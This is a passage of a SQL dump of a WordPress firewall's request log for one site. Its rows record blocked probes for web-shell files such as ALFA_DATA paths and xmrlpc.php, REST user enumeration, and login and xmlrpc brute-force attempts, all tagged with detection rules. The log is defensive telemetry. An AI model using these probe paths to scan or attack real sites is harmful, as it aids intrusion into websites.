(50833, 1712011457.451030, 1712011456.857900, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\þ{', 0, 403, 0, 0, 0, 'https://www.happythinking.com/wp-admin/dropdown.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWFkbWluL2Ryb3Bkb3duLnBocA==","category":"brute-force","ssl":1}'),
(50628, 1711731948.245786, 1711731947.889800, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///wp-admin/css/colors/blue/xmrlpc.php?p=', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vd3AtYWRtaW4vY3NzL2NvbG9ycy9ibHVlL3htcmxwYy5waHA=","category":"brute-force","ssl":1}'),
(50560, 1711583776.255803, 1711583775.909500, '\0\0\0\0\0\0\0\0\0\0ÿÿ“-H½', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', 'https://www.happythinking.com/wp-login.php', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{"learningMode":0,"failedRules":"","paramKey":"","paramValue":"","path":"L3dwLWxvZ2luLnBocA=="}'),
(50535, 1711400556.104458, 1711400555.537800, '\0\0\0\0\0\0\0\0\0\0ÿÿæ-Ã', 0, 403, 0, 0, 0, 'https://happythinking.com/xxl.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVpbGQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9iaWxlIFNhZmFyaS81MzcuMzY=","path":"L3h4bC5waHA=","category":"brute-force","ssl":1}'),
(50549, 1711503734.388436, 1711503734.047600, '\0\0\0\0\0\0\0\0\0\0ÿÿ3‘.''', 0, 403, 0, 0, 0, 'https://happythinking.com/simple.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3NpbXBsZS5waHA=","category":"brute-force","ssl":1}'),
(50536, 1711400554.093805, 1711400553.392600, '\0\0\0\0\0\0\0\0\0\0ÿÿæ-Ã', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-content/plugins/press/wp-class.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVpbGQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9iaWxlIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9wcmVzcy93cC1jbGFzcy5waHA=","category":"brute-force","ssl":1}'),
(50563, 1711583772.669125, 1711583772.249800, '\0\0\0\0\0\0\0\0\0\0ÿÿ“-H½', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', 'https://www.happythinking.com/wp-login.php', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{"learningMode":0,"failedRules":"","paramKey":"","paramValue":"","path":"L3dwLWxvZ2luLnBocA=="}'),
(50548, 1711487305.413520, 1711487304.271000, '\0\0\0\0\0\0\0\0\0\0ÿÿ§Vnd', 0, 403, 0, 0, 0, 'https://happythinking.com/simple.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3NpbXBsZS5waHA=","category":"brute-force","ssl":1}'),
(50564, 1711583771.444859, 1711583771.015000, '\0\0\0\0\0\0\0\0\0\0ÿÿ“-H½', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', 'https://www.happythinking.com/wp-login.php', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{"learningMode":0,"failedRules":"","paramKey":"","paramValue":"","path":"L3dwLWxvZ2luLnBocA=="}'),
(50396, 1711215314.471774, 1711215314.091800, '\0\0\0\0\0\0\0\0\0\0ÿÿ^œDU', 0, 403, 0, 0, 0, 'https://happythinking.com/style.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3N0eWxlLnBocA==","category":"brute-force","ssl":1}'),
(50282, 0.000000, 1711079893.461675, '\0\0\0\0\0\0\0\0\0\0ÿÿ£@E', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50283, 0.000000, 1711080637.306316, '\0\0\0\0\0\0\0\0\0\0ÿÿ£@E', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'loginFailInvalidUsername', NULL, NULL),
(50284, 1711080828.080615, 1711080827.729900, '\0\0\0\0\0\0\0\0\0\0ÿÿ›…\Z)', 0, 403, 0, 0, 0, 'https://www.happythinking.com/bypass.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2J5cGFzcy5waHA=","category":"brute-force","ssl":1}'),
(50879, 1712062399.786043, 1712062399.050100, '\0\0\0\0\0\0\0\0\0\0ÿÿãpç', 0, 403, 0, 0, 0, 'https://www.happythinking.com/wp-login.php?action=register', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWxvZ2luLnBocA==","category":"brute-force","ssl":1}'),
(50873, 1712062408.954871, 1712062408.538300, '\0\0\0\0\0\0\0\0\0\0ÿÿãpç', 0, 403, 0, 0, 0, 'https://happythinking.com/ae.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2FlLnBocA==","category":"brute-force","ssl":1}'),
(50455, 1711359159.698361, 1711359159.372000, '\0\0\0\0\0\0\0\0\0\0ÿÿT÷ÿ', 0, 403, 0, 0, 0, 'https://www.happythinking.com/wp-content/themes/applica/400.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvdGhlbWVzL2FwcGxpY2EvNDAwLnBocA==","category":"brute-force","ssl":1}'),
(50456, 1711359153.843726, 1711359153.450200, '\0\0\0\0\0\0\0\0\0\0ÿÿT÷ÿ', 0, 403, 0, 0, 0, 'https://www.happythinking.com/wp-content/themes/twentyseventeen/page/index.php?p=', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvdGhlbWVzL3R3ZW50eXNldmVudGVlbi9wYWdlL2luZGV4LnBocA==","category":"brute-force","ssl":1}'),
(50457, 1711359149.689011, 1711359149.316100, '\0\0\0\0\0\0\0\0\0\0ÿÿT÷ÿ', 0, 403, 0, 0, 0, 'https://www.happythinking.com/wp-includes/js/tinymce/skins/lightgray/img/index.php?p=', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWluY2x1ZGVzL2pzL3RpbnltY2Uvc2tpbnMvbGlnaHRncmF5L2ltZy9pbmRleC5waHA=","category":"brute-force","ssl":1}'),
(51872, 1712562406.455977, 1712562405.514000, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹;$', 0, 403, 0, 0, 0, 'https://happythinking.com/ALFA_DATA/alfacgiapi/perl.alfa', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L0FMRkFfREFUQS9hbGZhY2dpYXBpL3BlcmwuYWxmYQ==","category":"brute-force","ssl":1}'),
(51864, 1712520733.315588, 1712520732.971800, '\0\0\0\0\0\0\0\0\0\0ÿÿÏöRê', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/essential-addons-for-elementor-lite/readme.txt', 'www.google.com', 'Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9lc3NlbnRpYWwtYWRkb25zLWZvci1lbGVtZW50b3ItbGl0ZS9yZWFkbWUudHh0","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9lc3NlbnRpYWwtYWRkb25zLWZvci1lbGVtZW50b3ItbGl0ZS9yZWFkbWUudHh0","category":"discovery-and-probing","ssl":1}'),
(52003, 1712689944.491989, 1712689944.076800, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/inputs.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2lucHV0cy5waHA=","category":"brute-force","ssl":1}'),
(51887, 1712582143.297319, 1712582142.781900, '\0\0\0\0\0\0\0\0\0\0ÿÿ€Çxî', 0, 403, 0, 0, 0, 'https://happythinking.com/blog/wp-admin/install.php', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 'blocked:waf', 'WordPress New Install File Probing', '{"learningMode":0,"failedRules":"506","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L2Jsb2cvd3AtYWRtaW4vaW5zdGFsbC5waHA=","path":"L2Jsb2cvd3AtYWRtaW4vaW5zdGFsbC5waHA=","category":"discovery-and-probing","ssl":1}'),
(50460, 1711359051.394527, 1711359051.067500, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/text.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3RleHQucGhw","category":"brute-force","ssl":1}'),
(50461, 1711359039.590042, 1711359039.249500, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/autoload_classmap.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2F1dG9sb2FkX2NsYXNzbWFwLnBocA==","category":"brute-force","ssl":1}'),
(50462, 1711359021.473849, 1711359021.156900, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/inputs.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2lucHV0cy5waHA=","category":"brute-force","ssl":1}'),
(50427, 1711358537.990770, 1711358537.677200, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/content.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2NvbnRlbnQucGhw","category":"brute-force","ssl":1}'),
(50316, 1711080842.655298, 1711080842.333900, '\0\0\0\0\0\0\0\0\0\0ÿÿ›…\Z)', 0, 403, 0, 0, 0, 'https://www.happythinking.com/updates.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3VwZGF0ZXMucGhw","category":"brute-force","ssl":1}'),
(50351, 1711102630.124765, 1711102629.749200, '\0\0\0\0\0\0\0\0\0\0ÿÿ3i', 0, 403, 0, 0, 0, 'https://happythinking.com/', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Lw==","category":"brute-force","ssl":1}'),
(50352, 1711110039.379857, 1711110039.000500, '\0\0\0\0\0\0\0\0\0\0ÿÿT÷ù', 0, 403, 0, 0, 0, 'https://www.happythinking.com//?rest_route=%2Fwp%2Fv2%2Fusers', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8=","category":"brute-force","ssl":1}'),
(50360, 0.000000, 1711120913.133576, '\0\0\0\0\0\0\0\0\0\0ÿÿ^.x', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50361, 0.000000, 1711120914.972036, '\0\0\0\0\0\0\0\0\0\0ÿÿ[k–\\', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.83 Safari/537.1', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50362, 0.000000, 1711120922.081625, '\0\0\0\0\0\0\0\0\0\0ÿÿuxZ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36', 'loginFailInvalidUsername', NULL, NULL),
(50363, 0.000000, 1711120932.572884, '\0\0\0\0\0\0\0\0\0\0ÿÿg‘2E', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50364, 0.000000, 1711120942.843659, '\0\0\0\0\0\0\0\0\0\0ÿÿ(qÌX', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50365, 0.000000, 1711120942.639282, '\0\0\0\0\0\0\0\0\0\0ÿÿŸKp3', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL);
INSERT INTO `wpou_wfhits` VALUES
